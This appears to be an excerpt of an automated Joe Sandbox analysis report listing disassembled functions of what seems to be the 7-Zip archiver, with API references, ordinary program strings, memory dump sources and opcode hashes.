                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006ABCD4
                                                                                                                                                                                                                                                                              • Part of subcall function 00662320: free.MSVCRT ref: 0066237E
                                                                                                                                                                                                                                                                              • Part of subcall function 00662320: fputs.MSVCRT ref: 006623B8
                                                                                                                                                                                                                                                                              • Part of subcall function 00662320: free.MSVCRT ref: 006623C4
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006ABD17
                                                                                                                                                                                                                                                                              • Part of subcall function 00662300: fputc.MSVCRT ref: 00662311
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006ABD2B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputsfree$fputc
                                                                                                                                                                                                                                                                            • String ID: : $Write SFX:
                                                                                                                                                                                                                                                                            • API String ID: 3584323934-2530961540
                                                                                                                                                                                                                                                                            • Opcode ID: 0858727a3d2188373386701502e4491ffbda9cac782742d358bcdb59749fd626
                                                                                                                                                                                                                                                                            • Instruction ID: 96f10ba4a24a4beff46b4b23b6de7eaf6f70371e8f9dbf37334953068d7b9585
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0858727a3d2188373386701502e4491ffbda9cac782742d358bcdb59749fd626
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B0167A230094180DF60EF25E86435E6322EB85FF4F48D331AE2E577A9DF28C986C744
                                                                                                                                                                                                                                                                            Function 006ABB18 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006ABB49
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006ABB76
                                                                                                                                                                                                                                                                              • Part of subcall function 00662568: free.MSVCRT ref: 006625B5
                                                                                                                                                                                                                                                                              • Part of subcall function 00662568: free.MSVCRT ref: 006625C0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputsfree
                                                                                                                                                                                                                                                                            • String ID: Creating archive: $StdOut$Updating archive:
                                                                                                                                                                                                                                                                            • API String ID: 2581285248-1319951512
                                                                                                                                                                                                                                                                            • Opcode ID: fa99d9322174690535497a2fdc6b3fb821a8ef614adec2876cfee3e0304a3bf5
                                                                                                                                                                                                                                                                            • Instruction ID: a47ffb80435913001fc047fdbe9bd6727bc03d16832fbf4a212ba6bef3943cbb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa99d9322174690535497a2fdc6b3fb821a8ef614adec2876cfee3e0304a3bf5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28F062A5701E4681DF44EF26D9E435C2323AB45FD4F48E4368D0E5B329EF29C8D98710
                                                                                                                                                                                                                                                                            Function 0066ECDC Relevance: 8.8, APIs: 7, Instructions: 21COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: a6ffee1f7beb7570a11c572b2a51825e1f9c21a757c731fd3d53281771c8903a
                                                                                                                                                                                                                                                                            • Instruction ID: ba5c11d859e38c999ff565aefdfdce1127d69db3dbddffa48bf0d76d5fd8dcf2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6ffee1f7beb7570a11c572b2a51825e1f9c21a757c731fd3d53281771c8903a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FEE0DCB2618C0581DB54FF76DCB112C6325E7D7F4471410559F2D5B3A5CD10C8528388
                                                                                                                                                                                                                                                                            Function 00673F0C Relevance: 7.7, APIs: 6, Instructions: 191COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 167d3dd7d05659914fe51c99b092b0523b74a4040e8688ef161580a56a1d8b48
                                                                                                                                                                                                                                                                            • Instruction ID: 5c91428358c1b93159db01a06359fb10e549fb881ba7155dcb2d79cc30b549f0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 167d3dd7d05659914fe51c99b092b0523b74a4040e8688ef161580a56a1d8b48
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 368124B3305AC485CB10AF2AD8942ED77A2F785F98F488526DE5D0B769CF39C886C315
                                                                                                                                                                                                                                                                            Function 0068E954 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 182COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Q
                                                                                                                                                                                                                                                                            • API String ID: 0-3463352047
                                                                                                                                                                                                                                                                            • Opcode ID: 708d1e99ea4dbab6444f2f0d64f520fcdf94141e7dceb2e288505dbe970de39d
                                                                                                                                                                                                                                                                            • Instruction ID: 760260056a1e26af740929554279f94688e5f21626e9ebffeff005c5026fa4ed
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 708d1e99ea4dbab6444f2f0d64f520fcdf94141e7dceb2e288505dbe970de39d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F61B472318A81C2CB20EF25E48066EB762F7C4B94F545215FB9B577A8DF79C882CB04
                                                                                                                                                                                                                                                                            Function 006788EC Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 138COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID: act:$ cpus:$ gran:$ page:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-454015223
                                                                                                                                                                                                                                                                            • Opcode ID: 76ce10e08a2d6057f8ef9cd9582c59867cc4f4bd53d0f5b9092ac68896eb7e3a
                                                                                                                                                                                                                                                                            • Instruction ID: 953414219ac2adb28906e7c449d19634567f68662ed2ddba1cd5a862c1a16de4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76ce10e08a2d6057f8ef9cd9582c59867cc4f4bd53d0f5b9092ac68896eb7e3a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3651E8A5380A0395CF68EF15E9743A82323EB497D0F84D136DA0E4BB58DF78C991C344
                                                                                                                                                                                                                                                                            Function 00670160 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 123COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006701D7
                                                                                                                                                                                                                                                                            • _CxxThrowException.MSVCRT ref: 006702EA
                                                                                                                                                                                                                                                                              • Part of subcall function 0066FD30: _CxxThrowException.MSVCRT ref: 0066FE50
                                                                                                                                                                                                                                                                            • _CxxThrowException.MSVCRT ref: 0067031F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Empty file path, xrefs: 006702CD
                                                                                                                                                                                                                                                                            • There is no second file name for rename pair:, xrefs: 00670302
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionThrow$free
                                                                                                                                                                                                                                                                            • String ID: Empty file path$There is no second file name for rename pair:
                                                                                                                                                                                                                                                                            • API String ID: 3129652135-1725603831
                                                                                                                                                                                                                                                                            • Opcode ID: 5b9fd34c360db10dc0dd9c3cf23a0ee1fe89007478e2cf63242fd60c53b15542
                                                                                                                                                                                                                                                                            • Instruction ID: 6fa64ac6b77c2ca122ea16900cc25b442ecabe4b06ca6774cfd9e7152d36ec76
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b9fd34c360db10dc0dd9c3cf23a0ee1fe89007478e2cf63242fd60c53b15542
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C441D273204684C1DA20EB19E84079A7B22F3867B8F908716DFBD17BD9DB39C695CB50
                                                                                                                                                                                                                                                                            Function 006803BC Relevance: 7.6, APIs: 5, Instructions: 108COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLastSecurity
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 555121230-0
                                                                                                                                                                                                                                                                            • Opcode ID: dbe237cfadc90cb09746e3018bc91a680bb73bee37176d8e7191999cda9ad572
                                                                                                                                                                                                                                                                            • Instruction ID: aeb00720597ff08e5720ed2af9532cd3249d16e174b4c12ddfab36ed62973090
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dbe237cfadc90cb09746e3018bc91a680bb73bee37176d8e7191999cda9ad572
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9418C33301A8096D7A0EF25E8407A973A7F385B98F594635CF5A9BB14DF31C88AC752
                                                                                                                                                                                                                                                                            Function 006A4594 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 97COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID: = $h<k
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-3958619723
                                                                                                                                                                                                                                                                            • Opcode ID: 40c11fba967689670f12ed8931cb4eba44630f327dd0b6864abb2cd98b0bc6cc
                                                                                                                                                                                                                                                                            • Instruction ID: bd8acf384c1927b7208b0f448867b0faf5f23174454ff2628950d20359177b12
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40c11fba967689670f12ed8931cb4eba44630f327dd0b6864abb2cd98b0bc6cc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F931B462219A8096CB50EF54E89025EA722F7D27A0F941225FA8E43B68DFB8CD45CF00
                                                                                                                                                                                                                                                                            Function 0069E580 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID: #
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-1885708031
                                                                                                                                                                                                                                                                            • Opcode ID: b0f2d60c1820faef58548d21b8c4e06079b1368b0e0d09608c7fde7dbc05df21
                                                                                                                                                                                                                                                                            • Instruction ID: 9e660ce39c371b3adb0f302078e170f8f1a04db34f8e1fa2de8b19313a7f0850
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0f2d60c1820faef58548d21b8c4e06079b1368b0e0d09608c7fde7dbc05df21
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B31A333308A9081CF60DF15995049EA76AF7D57E4F540226FF9E5BBA4CE3AC882C704
                                                                                                                                                                                                                                                                            Function 00663CBC Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00663E32), ref: 00663D18
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00663E32), ref: 00663D25
                                                                                                                                                                                                                                                                            • _CxxThrowException.MSVCRT ref: 00663D4E
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00663E32), ref: 00663DC1
                                                                                                                                                                                                                                                                            • _CxxThrowException.MSVCRT ref: 00663DFA
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ByteCharExceptionMultiThrowWide$ErrorLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2296236218-0
                                                                                                                                                                                                                                                                            • Opcode ID: a638d3b70a987569a11810fe08a21e1709710d38c6574b86da1fec5f089001b5
                                                                                                                                                                                                                                                                            • Instruction ID: f6a55fff0329fa9d4067ced6366d9c9fbf5b9bed6a265f578cd4bf7213de948d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a638d3b70a987569a11810fe08a21e1709710d38c6574b86da1fec5f089001b5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B312473704BC58ADB20DF25E48039EBBA6F785B94F548025DB8963B20DB38CC91CB51
                                                                                                                                                                                                                                                                            Function 006A7080 Relevance: 7.6, APIs: 6, Instructions: 77COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
                                                                                                                                                                                                                                                                            • Instruction ID: 2d7ba40e5d136251b8408d20c5680a02bca7d7e76d00be4b5197c1e9b7ecc2cf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00216BB7306E4085CB25AF25D860369A362EB86FA9F294225DF2D17798CF35CC02C710
                                                                                                                                                                                                                                                                            Function 00666778 Relevance: 7.6, APIs: 5, Instructions: 74filetimeCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$Create$CloseHandleTimefree
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 234454789-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2c2437ba34a7087855f8770e7a2108f964c72db211cbb1ecc9a6ff53a80baa42
                                                                                                                                                                                                                                                                            • Instruction ID: 5ecc15d733299dad6cded28c0cabbdf404e7034efa30c79cd26f075e3c49b6c9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c2437ba34a7087855f8770e7a2108f964c72db211cbb1ecc9a6ff53a80baa42
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B21F63230458086D6609F66F954BAA6622F3867F8F540325EE7543BD8CB39CD8ADB01
                                                                                                                                                                                                                                                                            Function 0068BF88 Relevance: 7.6, APIs: 6, Instructions: 70COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memcmp
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1475443563-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1ace886e5cc3e700f187fce602ca08dcd48d7174a31f1a447d5d23bb38321506
                                                                                                                                                                                                                                                                            • Instruction ID: 2cd303a6be774d75f43fa7a9ddfe1ab374984043d01aec7c464d53b4802e888b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ace886e5cc3e700f187fce602ca08dcd48d7174a31f1a447d5d23bb38321506
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA11DFA130575191EB04BF2ADD513A833239B0AFE4F845524DE0A87306EF7ECEA6D715
                                                                                                                                                                                                                                                                            Function 00688290 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0066B544: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,Path64,006882CA), ref: 0066B56F
